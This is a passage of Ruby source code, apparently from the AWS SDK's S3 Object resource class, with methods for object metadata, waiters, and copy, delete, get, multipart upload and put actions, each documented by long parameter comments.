# * If requesting an object from a destination bucket — Amazon S3 will
# return the `x-amz-replication-status` header with value REPLICA if
# the object in your request is a replica that Amazon S3 created and
# there is no replica modification replication in progress.
#
# * When replicating objects to multiple destination buckets the
# `x-amz-replication-status` header acts differently. The header of
# the source object will only return a value of COMPLETED when
# replication is successful to all destinations. The header will
# remain at value PENDING until replication has completed for all
# destinations. If one or more destinations fails replication the
# header will return FAILED.
#
# For more information, see [Replication][1].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/NotificationHowTo.html
# @return [String]
def replication_status
data[:replication_status]
end
# The count of parts this object has.
# @return [Integer]
def parts_count
data[:parts_count]
end
# The Object Lock mode, if any, that's in effect for this object. This
# header is only returned if the requester has the
# `s3:GetObjectRetention` permission. For more information about S3
# Object Lock, see [Object Lock][1].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock.html
# @return [String]
def object_lock_mode
data[:object_lock_mode]
end
# The date and time when the Object Lock retention period expires. This
# header is only returned if the requester has the
# `s3:GetObjectRetention` permission.
# @return [Time]
def object_lock_retain_until_date
data[:object_lock_retain_until_date]
end
# Specifies whether a legal hold is in effect for this object. This
# header is only returned if the requester has the
# `s3:GetObjectLegalHold` permission. This header is not returned if the
# specified version of this object has never had a legal hold applied.
# For more information about S3 Object Lock, see [Object Lock][1].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock.html
# @return [String]
def object_lock_legal_hold_status
data[:object_lock_legal_hold_status]
end
# @!endgroup
# @return [Client]
def client
@client
end
# Loads, or reloads {#data} for the current {Object}.
# Returns `self` making it possible to chain methods.
#
# object.reload.data
#
# @return [self]
def load
resp = @client.head_object(
bucket: @bucket_name,
key: @key
)
@data = resp.data
self
end
alias :reload :load
# @return [Types::HeadObjectOutput]
# Returns the data for this {Object}. Calls
# {Client#head_object} if {#data_loaded?} is `false`.
def data
load unless @data
@data
end
# @return [Boolean]
# Returns `true` if this resource is loaded. Accessing attributes or
# {#data} on an unloaded resource will trigger a call to {#load}.
def data_loaded?
!!@data
end
# @param [Hash] options ({})
# @return [Boolean]
# Returns `true` if the Object exists.
def exists?(options = {})
begin
wait_until_exists(options.merge(max_attempts: 1))
true
rescue Aws::Waiters::Errors::UnexpectedError => e
raise e.error
rescue Aws::Waiters::Errors::WaiterFailed
false
end
end
# @param [Hash] options ({})
# @option options [Integer] :max_attempts (20)
# @option options [Float] :delay (5)
# @option options [Proc] :before_attempt
# @option options [Proc] :before_wait
# @return [Object]
def wait_until_exists(options = {}, &block)
options, params = separate_params_and_options(options)
waiter = Waiters::ObjectExists.new(options)
yield_waiter_and_warn(waiter, &block) if block_given?
waiter.wait(params.merge(bucket: @bucket_name,
key: @key))
Object.new({
bucket_name: @bucket_name,
key: @key,
client: @client
})
end
# @param [Hash] options ({})
# @option options [Integer] :max_attempts (20)
# @option options [Float] :delay (5)
# @option options [Proc] :before_attempt
# @option options [Proc] :before_wait
# @return [Object]
def wait_until_not_exists(options = {}, &block)
options, params = separate_params_and_options(options)
waiter = Waiters::ObjectNotExists.new(options)
yield_waiter_and_warn(waiter, &block) if block_given?
waiter.wait(params.merge(bucket: @bucket_name,
key: @key))
Object.new({
bucket_name: @bucket_name,
key: @key,
client: @client
})
end
# @deprecated Use [Aws::S3::Client] #wait_until instead
#
# Waiter polls an API operation until a resource enters a desired
# state.
#
# @note The waiting operation is performed on a copy. The original resource
# remains unchanged.
#
# ## Basic Usage
#
# Waiter will polls until it is successful, it fails by
# entering a terminal state, or until a maximum number of attempts
# are made.
#
# # polls in a loop until condition is true
# resource.wait_until(options) {|resource| condition}
#
# ## Example
#
# instance.wait_until(max_attempts:10, delay:5) do |instance|
# instance.state.name == 'running'
# end
#
# ## Configuration
#
# You can configure the maximum number of polling attempts, and the
# delay (in seconds) between each polling attempt. The waiting condition is
# set by passing a block to {#wait_until}:
#
# # poll for ~25 seconds
# resource.wait_until(max_attempts:5,delay:5) {|resource|...}
#
# ## Callbacks
#
# You can be notified before each polling attempt and before each
# delay. If you throw `:success` or `:failure` from these callbacks,
# it will terminate the waiter.
#
# started_at = Time.now
# # poll for 1 hour, instead of a number of attempts
# proc = Proc.new do |attempts, response|
# throw :failure if Time.now - started_at > 3600
# end
#
# # disable max attempts
# instance.wait_until(before_wait:proc, max_attempts:nil) {...}
#
# ## Handling Errors
#
# When a waiter is successful, it returns the Resource. When a waiter
# fails, it raises an error.
#
# begin
# resource.wait_until(...)
# rescue Aws::Waiters::Errors::WaiterFailed
# # resource did not enter the desired state in time
# end
#
# @yieldparam [Resource] resource to be used in the waiting condition.
#
# @raise [Aws::Waiters::Errors::FailureStateError] Raised when the waiter
# terminates because the waiter has entered a state that it will not
# transition out of, preventing success.
#
# yet successful.
#
# @raise [Aws::Waiters::Errors::UnexpectedError] Raised when an error is
# encountered while polling for a resource that is not expected.
#
# @raise [NotImplementedError] Raised when the resource does not
#
# @option options [Integer] :max_attempts (10) Maximum number of
# attempts
# @option options [Integer] :delay (10) Delay between each
# attempt in seconds
# @option options [Proc] :before_attempt (nil) Callback
# invoked before each attempt
# @option options [Proc] :before_wait (nil) Callback
# invoked before each wait
# @return [Resource] if the waiter was successful
def wait_until(options = {}, &block)
self_copy = self.dup
attempts = 0
options[:max_attempts] = 10 unless options.key?(:max_attempts)
options[:delay] ||= 10
options[:poller] = Proc.new do
attempts += 1
if block.call(self_copy)
[:success, self_copy]
else
self_copy.reload unless attempts == options[:max_attempts]
:retry
end
end
Aws::Waiters::Waiter.new(options).wait({})
end
# @!group Actions
# @example Request syntax with placeholder values
#
# object.copy_from({
# acl: "private", # accepts private, public-read, public-read-write, authenticated-read, aws-exec-read, bucket-owner-read, bucket-owner-full-control
# cache_control: "CacheControl",
# content_disposition: "ContentDisposition",
# content_encoding: "ContentEncoding",
# content_language: "ContentLanguage",
# content_type: "ContentType",
# copy_source: "CopySource", # required
# copy_source_if_match: "CopySourceIfMatch",
# copy_source_if_modified_since: Time.now,
# copy_source_if_none_match: "CopySourceIfNoneMatch",
# copy_source_if_unmodified_since: Time.now,
# expires: Time.now,
# grant_full_control: "GrantFullControl",
# grant_read: "GrantRead",
# grant_read_acp: "GrantReadACP",
# grant_write_acp: "GrantWriteACP",
# metadata: {
# "MetadataKey" => "MetadataValue",
# },
# metadata_directive: "COPY", # accepts COPY, REPLACE
# tagging_directive: "COPY", # accepts COPY, REPLACE
# server_side_encryption: "AES256", # accepts AES256, aws:kms
# storage_class: "STANDARD", # accepts STANDARD, REDUCED_REDUNDANCY, STANDARD_IA, ONEZONE_IA, INTELLIGENT_TIERING, GLACIER, DEEP_ARCHIVE, OUTPOSTS
# website_redirect_location: "WebsiteRedirectLocation",
# sse_customer_algorithm: "SSECustomerAlgorithm",
# sse_customer_key: "SSECustomerKey",
# sse_customer_key_md5: "SSECustomerKeyMD5",
# ssekms_key_id: "SSEKMSKeyId",
# ssekms_encryption_context: "SSEKMSEncryptionContext",
# bucket_key_enabled: false,
# copy_source_sse_customer_algorithm: "CopySourceSSECustomerAlgorithm",
# copy_source_sse_customer_key: "CopySourceSSECustomerKey",
# copy_source_sse_customer_key_md5: "CopySourceSSECustomerKeyMD5",
# request_payer: "requester", # accepts requester
# tagging: "TaggingHeader",
# object_lock_mode: "GOVERNANCE", # accepts GOVERNANCE, COMPLIANCE
# object_lock_retain_until_date: Time.now,
# object_lock_legal_hold_status: "ON", # accepts ON, OFF
# expected_bucket_owner: "AccountId",
# expected_source_bucket_owner: "AccountId",
# })
# @param [Hash] options ({})
# @option options [String] :acl
# The canned ACL to apply to the object.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :cache_control
# Specifies caching behavior along the request/reply chain.
# @option options [String] :content_disposition
# Specifies presentational information for the object.
# @option options [String] :content_encoding
# Specifies what content encodings have been applied to the object and
# thus what decoding mechanisms must be applied to obtain the media-type
# referenced by the Content-Type header field.
# @option options [String] :content_language
# The language the content is in.
# @option options [String] :content_type
# A standard MIME type describing the format of the object data.
# @option options [required, String] :copy_source
# Specifies the source object for the copy operation. You specify the
# value in one of two formats, depending on whether you want to access
# the source object through an [access point][1]\:
#
# * For objects not accessed through an access point, specify the name
# of the source bucket and the key of the source object, separated by
# a slash (/). For example, to copy the object `reports/january.pdf`
# from the bucket `awsexamplebucket`, use
# `awsexamplebucket/reports/january.pdf`. The value must be URL
# encoded.
#
# * For objects accessed through access points, specify the Amazon
# Resource Name (ARN) of the object as accessed through the access
# point, in the format
# `arn:aws:s3:<Region>:<account-id>:accesspoint/<access-point-name>/object/<key>`.
# For example, to copy the object `reports/january.pdf` through access
# point `my-access-point` owned by account `123456789012` in Region
# `us-west-2`, use the URL encoding of
# `arn:aws:s3:us-west-2:123456789012:accesspoint/my-access-point/object/reports/january.pdf`.
# The value must be URL encoded.
#
# <note markdown="1"> Amazon S3 supports copy operations using access points only when the
# source and destination buckets are in the same AWS Region.
#
# </note>
#
# Alternatively, for objects accessed through Amazon S3 on Outposts,
# specify the ARN of the object as accessed in the format
# `arn:aws:s3-outposts:<Region>:<account-id>:outpost/<outpost-id>/object/<key>`.
# For example, to copy the object `reports/january.pdf` through
# outpost `my-outpost` owned by account `123456789012` in Region
# `us-west-2`, use the URL encoding of
# `arn:aws:s3-outposts:us-west-2:123456789012:outpost/my-outpost/object/reports/january.pdf`.
# The value must be URL encoded.
#
# To copy a specific version of an object, append
# `?versionId=<version-id>` to the value (for example,
# `awsexamplebucket/reports/january.pdf?versionId=QUpfdndhfd8438MNFDN93jdnJFkdmqnh893`).
# If you don't specify a version ID, Amazon S3 copies the latest
# version of the source object.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/access-points.html
# @option options [String] :copy_source_if_match
# Copies the object if its entity tag (ETag) matches the specified tag.
# @option options [Time,DateTime,Date,Integer,String] :copy_source_if_modified_since
# Copies the object if it has been modified since the specified time.
# @option options [String] :copy_source_if_none_match
# Copies the object if its entity tag (ETag) is different than the
# specified ETag.
# @option options [Time,DateTime,Date,Integer,String] :copy_source_if_unmodified_since
# Copies the object if it hasn't been modified since the specified
# time.
# @option options [Time,DateTime,Date,Integer,String] :expires
# The date and time at which the object is no longer cacheable.
# @option options [String] :grant_full_control
# Gives the grantee READ, READ\_ACP, and WRITE\_ACP permissions on the
# object.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_read
# Allows grantee to read the object data and its metadata.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_read_acp
# Allows grantee to read the object ACL.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_write_acp
# Allows grantee to write the ACL for the applicable object.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [Hash<String,String>] :metadata
# A map of metadata to store with the object in S3.
# @option options [String] :metadata_directive
# Specifies whether the metadata is copied from the source object or
# replaced with metadata provided in the request.
# @option options [String] :tagging_directive
# Specifies whether the object tag-set are copied from the source object
# or replaced with tag-set provided in the request.
# @option options [String] :server_side_encryption
# The server-side encryption algorithm used when storing this object in
# Amazon S3 (for example, AES256, aws:kms).
# @option options [String] :storage_class
# By default, Amazon S3 uses the STANDARD Storage Class to store newly
# created objects. The STANDARD storage class provides high durability
# and high availability. Depending on performance needs, you can specify
# a different Storage Class. Amazon S3 on Outposts only uses the
# OUTPOSTS Storage Class. For more information, see [Storage Classes][1]
# in the *Amazon S3 Service Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/storage-class-intro.html
# @option options [String] :website_redirect_location
# If the bucket is configured as a website, redirects requests for this
# object to another object in the same bucket or to an external URL.
# Amazon S3 stores the value of this header in the object metadata.
# @option options [String] :sse_customer_algorithm
# Specifies the algorithm to use to when encrypting the object (for
# example, AES256).
# @option options [String] :sse_customer_key
# Specifies the customer-provided encryption key for Amazon S3 to use in
# encrypting data. This value is used to store the object and then it is
# discarded; Amazon S3 does not store the encryption key. The key must
# be appropriate for use with the algorithm specified in the
# `x-amz-server-side-encryption-customer-algorithm` header.
# @option options [String] :sse_customer_key_md5
# Specifies the 128-bit MD5 digest of the encryption key according to
# RFC 1321. Amazon S3 uses this header for a message integrity check to
# ensure that the encryption key was transmitted without error.
# @option options [String] :ssekms_key_id
# Specifies the AWS KMS key ID to use for object encryption. All GET and
# PUT requests for an object protected by AWS KMS will fail if not made
# via SSL or using SigV4. For information about configuring using any of
# the officially supported AWS SDKs and AWS CLI, see [Specifying the
# Signature Version in Request Authentication][1] in the *Amazon S3
# Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingAWSSDK.html#specify-signature-version
# @option options [String] :ssekms_encryption_context
# Specifies the AWS KMS Encryption Context to use for object encryption.
# The value of this header is a base64-encoded UTF-8 string holding JSON
# with the encryption context key-value pairs.
# @option options [Boolean] :bucket_key_enabled
# Specifies whether Amazon S3 should use an S3 Bucket Key for object
# encryption with server-side encryption using AWS KMS (SSE-KMS).
# Setting this header to `true` causes Amazon S3 to use an S3 Bucket Key
# for object encryption with SSE-KMS.
#
# Specifying this header with a COPY action doesn’t affect bucket-level
# settings for S3 Bucket Key.
# @option options [String] :copy_source_sse_customer_algorithm
# Specifies the algorithm to use when decrypting the source object (for
# example, AES256).
# @option options [String] :copy_source_sse_customer_key
# Specifies the customer-provided encryption key for Amazon S3 to use to
# decrypt the source object. The encryption key provided in this header
# must be one that was used when the source object was created.
# @option options [String] :copy_source_sse_customer_key_md5
# Specifies the 128-bit MD5 digest of the encryption key according to
# RFC 1321. Amazon S3 uses this header for a message integrity check to
# ensure that the encryption key was transmitted without error.
# @option options [String] :request_payer
# Confirms that the requester knows that they will be charged for the
# request. Bucket owners need not specify this parameter in their
# requests. For information about downloading objects from requester
# pays buckets, see [Downloading Objects in Requestor Pays Buckets][1]
# in the *Amazon S3 Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/ObjectsinRequesterPaysBuckets.html
# @option options [String] :tagging
# The tag-set for the object destination object this value must be used
# in conjunction with the `TaggingDirective`. The tag-set must be
# encoded as URL Query parameters.
# @option options [String] :object_lock_mode
# The Object Lock mode that you want to apply to the copied object.
# @option options [Time,DateTime,Date,Integer,String] :object_lock_retain_until_date
# The date and time when you want the copied object's Object Lock to
# expire.
# @option options [String] :object_lock_legal_hold_status
# Specifies whether you want to apply a Legal Hold to the copied object.
# @option options [String] :expected_bucket_owner
# The account id of the expected destination bucket owner. If the
# destination bucket is owned by a different account, the request will
# fail with an HTTP `403 (Access Denied)` error.
# @option options [String] :expected_source_bucket_owner
# The account id of the expected source bucket owner. If the source
# bucket is owned by a different account, the request will fail with an
# HTTP `403 (Access Denied)` error.
# @return [Types::CopyObjectOutput]
def copy_from(options = {})
options = options.merge(
bucket: @bucket_name,
key: @key
)
resp = @client.copy_object(options)
resp.data
end
# @example Request syntax with placeholder values
#
# object.delete({
# mfa: "MFA",
# version_id: "ObjectVersionId",
# request_payer: "requester", # accepts requester
# bypass_governance_retention: false,
# expected_bucket_owner: "AccountId",
# })
# @param [Hash] options ({})
# @option options [String] :mfa
# The concatenation of the authentication device's serial number, a
# space, and the value that is displayed on your authentication device.
# Required to permanently delete a versioned object if versioning is
# configured with MFA delete enabled.
# @option options [String] :version_id
# VersionId used to reference a specific version of the object.
# @option options [String] :request_payer
# Confirms that the requester knows that they will be charged for the
# request. Bucket owners need not specify this parameter in their
# requests. For information about downloading objects from requester
# pays buckets, see [Downloading Objects in Requestor Pays Buckets][1]
# in the *Amazon S3 Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/ObjectsinRequesterPaysBuckets.html
# @option options [Boolean] :bypass_governance_retention
# Indicates whether S3 Object Lock should bypass Governance-mode
# restrictions to process this operation.
# @option options [String] :expected_bucket_owner
# The account id of the expected bucket owner. If the bucket is owned by
# a different account, the request will fail with an HTTP `403 (Access
# Denied)` error.
# @return [Types::DeleteObjectOutput]
def delete(options = {})
options = options.merge(
bucket: @bucket_name,
key: @key
)
resp = @client.delete_object(options)
resp.data
end
# @example Request syntax with placeholder values
#
# object.get({
# if_match: "IfMatch",
# if_modified_since: Time.now,
# if_none_match: "IfNoneMatch",
# if_unmodified_since: Time.now,
# range: "Range",
# response_cache_control: "ResponseCacheControl",
# response_content_disposition: "ResponseContentDisposition",
# response_content_encoding: "ResponseContentEncoding",
# response_content_language: "ResponseContentLanguage",
# response_content_type: "ResponseContentType",
# response_expires: Time.now,
# version_id: "ObjectVersionId",
# sse_customer_algorithm: "SSECustomerAlgorithm",
# sse_customer_key: "SSECustomerKey",
# sse_customer_key_md5: "SSECustomerKeyMD5",
# request_payer: "requester", # accepts requester
# part_number: 1,
# expected_bucket_owner: "AccountId",
# })
# @param [Hash] options ({})
# @option options [String] :if_match
# Return the object only if its entity tag (ETag) is the same as the one
# specified, otherwise return a 412 (precondition failed).
# @option options [Time,DateTime,Date,Integer,String] :if_modified_since
# Return the object only if it has been modified since the specified
# time, otherwise return a 304 (not modified).
# @option options [String] :if_none_match
# Return the object only if its entity tag (ETag) is different from the
# one specified, otherwise return a 304 (not modified).
# @option options [Time,DateTime,Date,Integer,String] :if_unmodified_since
# Return the object only if it has not been modified since the specified
# time, otherwise return a 412 (precondition failed).
# @option options [String] :range
# Downloads the specified range bytes of an object. For more information
# about the HTTP Range header, see
# [https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.35][1].
#
# <note markdown="1"> Amazon S3 doesn't support retrieving multiple ranges of data per
# `GET` request.
#
# </note>
#
#
#
# [1]: https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.35
# @option options [String] :response_cache_control
# Sets the `Cache-Control` header of the response.
# @option options [String] :response_content_disposition
# Sets the `Content-Disposition` header of the response
# @option options [String] :response_content_encoding
# Sets the `Content-Encoding` header of the response.
# @option options [String] :response_content_language
# Sets the `Content-Language` header of the response.
# @option options [String] :response_content_type
# Sets the `Content-Type` header of the response.
# @option options [Time,DateTime,Date,Integer,String] :response_expires
# Sets the `Expires` header of the response.
# @option options [String] :version_id
# VersionId used to reference a specific version of the object.
# @option options [String] :sse_customer_algorithm
# Specifies the algorithm to use to when decrypting the object (for
# example, AES256).
# @option options [String] :sse_customer_key
# Specifies the customer-provided encryption key for Amazon S3 used to
# encrypt the data. This value is used to decrypt the object when
# recovering it and must match the one used when storing the data. The
# key must be appropriate for use with the algorithm specified in the
# `x-amz-server-side-encryption-customer-algorithm` header.
# @option options [String] :sse_customer_key_md5
# Specifies the 128-bit MD5 digest of the encryption key according to
# RFC 1321. Amazon S3 uses this header for a message integrity check to
# ensure that the encryption key was transmitted without error.
# @option options [String] :request_payer
# Confirms that the requester knows that they will be charged for the
# request. Bucket owners need not specify this parameter in their
# requests. For information about downloading objects from requester
# pays buckets, see [Downloading Objects in Requestor Pays Buckets][1]
# in the *Amazon S3 Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/ObjectsinRequesterPaysBuckets.html
# @option options [Integer] :part_number
# Part number of the object being read. This is a positive integer
# between 1 and 10,000. Effectively performs a 'ranged' GET request
# for the part specified. Useful for downloading just a part of an
# object.
# @option options [String] :expected_bucket_owner
# The account id of the expected bucket owner. If the bucket is owned by
# a different account, the request will fail with an HTTP `403 (Access
# Denied)` error.
# @return [Types::GetObjectOutput]
def get(options = {}, &block)
options = options.merge(
bucket: @bucket_name,
key: @key
)
resp = @client.get_object(options, &block)
resp.data
end
# @example Request syntax with placeholder values
#
# multipartupload = object.initiate_multipart_upload({
# acl: "private", # accepts private, public-read, public-read-write, authenticated-read, aws-exec-read, bucket-owner-read, bucket-owner-full-control
# cache_control: "CacheControl",
# content_disposition: "ContentDisposition",
# content_encoding: "ContentEncoding",
# content_language: "ContentLanguage",
# content_type: "ContentType",
# expires: Time.now,
# grant_full_control: "GrantFullControl",
# grant_read: "GrantRead",
# grant_read_acp: "GrantReadACP",
# grant_write_acp: "GrantWriteACP",
# metadata: {
# "MetadataKey" => "MetadataValue",
# },
# server_side_encryption: "AES256", # accepts AES256, aws:kms
# storage_class: "STANDARD", # accepts STANDARD, REDUCED_REDUNDANCY, STANDARD_IA, ONEZONE_IA, INTELLIGENT_TIERING, GLACIER, DEEP_ARCHIVE, OUTPOSTS
# website_redirect_location: "WebsiteRedirectLocation",
# sse_customer_algorithm: "SSECustomerAlgorithm",
# sse_customer_key: "SSECustomerKey",
# sse_customer_key_md5: "SSECustomerKeyMD5",
# ssekms_key_id: "SSEKMSKeyId",
# ssekms_encryption_context: "SSEKMSEncryptionContext",
# bucket_key_enabled: false,
# request_payer: "requester", # accepts requester
# tagging: "TaggingHeader",
# object_lock_mode: "GOVERNANCE", # accepts GOVERNANCE, COMPLIANCE
# object_lock_retain_until_date: Time.now,
# object_lock_legal_hold_status: "ON", # accepts ON, OFF
# expected_bucket_owner: "AccountId",
# })
# @param [Hash] options ({})
# @option options [String] :acl
# The canned ACL to apply to the object.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :cache_control
# Specifies caching behavior along the request/reply chain.
# @option options [String] :content_disposition
# Specifies presentational information for the object.
# @option options [String] :content_encoding
# Specifies what content encodings have been applied to the object and
# thus what decoding mechanisms must be applied to obtain the media-type
# referenced by the Content-Type header field.
# @option options [String] :content_language
# The language the content is in.
# @option options [String] :content_type
# A standard MIME type describing the format of the object data.
# @option options [Time,DateTime,Date,Integer,String] :expires
# The date and time at which the object is no longer cacheable.
# @option options [String] :grant_full_control
# Gives the grantee READ, READ\_ACP, and WRITE\_ACP permissions on the
# object.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_read
# Allows grantee to read the object data and its metadata.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_read_acp
# Allows grantee to read the object ACL.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_write_acp
# Allows grantee to write the ACL for the applicable object.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [Hash<String,String>] :metadata
# A map of metadata to store with the object in S3.
# @option options [String] :server_side_encryption
# The server-side encryption algorithm used when storing this object in
# Amazon S3 (for example, AES256, aws:kms).
# @option options [String] :storage_class
# By default, Amazon S3 uses the STANDARD Storage Class to store newly
# created objects. The STANDARD storage class provides high durability
# and high availability. Depending on performance needs, you can specify
# a different Storage Class. Amazon S3 on Outposts only uses the
# OUTPOSTS Storage Class. For more information, see [Storage Classes][1]
# in the *Amazon S3 Service Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/storage-class-intro.html
# @option options [String] :website_redirect_location
# If the bucket is configured as a website, redirects requests for this
# object to another object in the same bucket or to an external URL.
# Amazon S3 stores the value of this header in the object metadata.
# @option options [String] :sse_customer_algorithm
# Specifies the algorithm to use to when encrypting the object (for
# example, AES256).
# @option options [String] :sse_customer_key
# Specifies the customer-provided encryption key for Amazon S3 to use in
# encrypting data. This value is used to store the object and then it is
# discarded; Amazon S3 does not store the encryption key. The key must
# be appropriate for use with the algorithm specified in the
# `x-amz-server-side-encryption-customer-algorithm` header.
# @option options [String] :sse_customer_key_md5
# Specifies the 128-bit MD5 digest of the encryption key according to
# RFC 1321. Amazon S3 uses this header for a message integrity check to
# ensure that the encryption key was transmitted without error.
# @option options [String] :ssekms_key_id
# Specifies the ID of the symmetric customer managed AWS KMS CMK to use
# for object encryption. All GET and PUT requests for an object
# protected by AWS KMS will fail if not made via SSL or using SigV4. For
# information about configuring using any of the officially supported
# AWS SDKs and AWS CLI, see [Specifying the Signature Version in Request
# Authentication][1] in the *Amazon S3 Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingAWSSDK.html#specify-signature-version
# @option options [String] :ssekms_encryption_context
# Specifies the AWS KMS Encryption Context to use for object encryption.
# The value of this header is a base64-encoded UTF-8 string holding JSON
# with the encryption context key-value pairs.
# @option options [Boolean] :bucket_key_enabled
# Specifies whether Amazon S3 should use an S3 Bucket Key for object
# encryption with server-side encryption using AWS KMS (SSE-KMS).
# Setting this header to `true` causes Amazon S3 to use an S3 Bucket Key
# for object encryption with SSE-KMS.
#
# Specifying this header with an object action doesn’t affect
# bucket-level settings for S3 Bucket Key.
# @option options [String] :request_payer
# Confirms that the requester knows that they will be charged for the
# request. Bucket owners need not specify this parameter in their
# requests. For information about downloading objects from requester
# pays buckets, see [Downloading Objects in Requestor Pays Buckets][1]
# in the *Amazon S3 Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/ObjectsinRequesterPaysBuckets.html
# @option options [String] :tagging
# The tag-set for the object. The tag-set must be encoded as URL Query
# parameters.
# @option options [String] :object_lock_mode
# Specifies the Object Lock mode that you want to apply to the uploaded
# object.
# @option options [Time,DateTime,Date,Integer,String] :object_lock_retain_until_date
# Specifies the date and time when you want the Object Lock to expire.
# @option options [String] :object_lock_legal_hold_status
# Specifies whether you want to apply a Legal Hold to the uploaded
# object.
# @option options [String] :expected_bucket_owner
# The account id of the expected bucket owner. If the bucket is owned by
# a different account, the request will fail with an HTTP `403 (Access
# Denied)` error.
# @return [MultipartUpload]
def initiate_multipart_upload(options = {})
options = options.merge(
bucket: @bucket_name,
key: @key
)
resp = @client.create_multipart_upload(options)
MultipartUpload.new(
bucket_name: @bucket_name,
object_key: @key,
id: resp.data.upload_id,
client: @client
)
end
# @example Request syntax with placeholder values
#
# object.put({
# acl: "private", # accepts private, public-read, public-read-write, authenticated-read, aws-exec-read, bucket-owner-read, bucket-owner-full-control
# body: source_file,
# cache_control: "CacheControl",
# content_disposition: "ContentDisposition",
# content_encoding: "ContentEncoding",
# content_language: "ContentLanguage",
# content_length: 1,
# content_md5: "ContentMD5",
# content_type: "ContentType",
# expires: Time.now,
# grant_full_control: "GrantFullControl",
# grant_read: "GrantRead",
# grant_read_acp: "GrantReadACP",
# grant_write_acp: "GrantWriteACP",
# metadata: {
# "MetadataKey" => "MetadataValue",
# },
# server_side_encryption: "AES256", # accepts AES256, aws:kms
# storage_class: "STANDARD", # accepts STANDARD, REDUCED_REDUNDANCY, STANDARD_IA, ONEZONE_IA, INTELLIGENT_TIERING, GLACIER, DEEP_ARCHIVE, OUTPOSTS
# website_redirect_location: "WebsiteRedirectLocation",
# sse_customer_algorithm: "SSECustomerAlgorithm",
# sse_customer_key: "SSECustomerKey",
# sse_customer_key_md5: "SSECustomerKeyMD5",
# ssekms_key_id: "SSEKMSKeyId",
# ssekms_encryption_context: "SSEKMSEncryptionContext",
# bucket_key_enabled: false,
# request_payer: "requester", # accepts requester
# tagging: "TaggingHeader",
# object_lock_mode: "GOVERNANCE", # accepts GOVERNANCE, COMPLIANCE
# object_lock_retain_until_date: Time.now,
# object_lock_legal_hold_status: "ON", # accepts ON, OFF
# expected_bucket_owner: "AccountId",
# })
# @param [Hash] options ({})
# @option options [String] :acl
# The canned ACL to apply to the object. For more information, see
# [Canned ACL][1].
#
# This action is not supported by Amazon S3 on Outposts.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#CannedACL
# @option options [String, StringIO, File] :body
# Object data.
# @option options [String] :cache_control
# Can be used to specify caching behavior along the request/reply chain.
# For more information, see
# [http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9][1].
#
#
#
# [1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9
# @option options [String] :content_disposition
# Specifies presentational information for the object. For more
# information, see
# [http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1][1].
#
#
#
# [1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1
# @option options [String] :content_encoding
# Specifies what content encodings have been applied to the object and
# thus what decoding mechanisms must be applied to obtain the media-type
# referenced by the Content-Type header field. For more information, see
# [http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11][1].
#
#
#
# [1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11
# @option options [String] :content_language
# The language the content is in.
# @option options [Integer] :content_length
# Size of the body in bytes. This parameter is useful when the size of
# the body cannot be determined automatically. For more information, see
# [http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.13][1].
#
#
#
# [1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.13
# @option options [String] :content_md5
# The base64-encoded 128-bit MD5 digest of the message (without the
# headers) according to RFC 1864. This header can be used as a message
# integrity check to verify that the data is the same data that was
# originally sent. Although it is optional, we recommend using the
# Content-MD5 mechanism as an end-to-end integrity check. For more
# information about REST request authentication, see [REST
# Authentication][1].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/RESTAuthentication.html
# @option options [String] :content_type
# A standard MIME type describing the format of the contents. For more
# information, see
# [http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.17][1].
#
#
#
# [1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.17
# @option options [Time,DateTime,Date,Integer,String] :expires
# The date and time at which the object is no longer cacheable. For more
# information, see
# [http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.21][1].
#
#
#
# [1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.21
# @option options [String] :grant_full_control
# Gives the grantee READ, READ\_ACP, and WRITE\_ACP permissions on the
# object.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_read
# Allows grantee to read the object data and its metadata.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_read_acp
# Allows grantee to read the object ACL.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :grant_write_acp
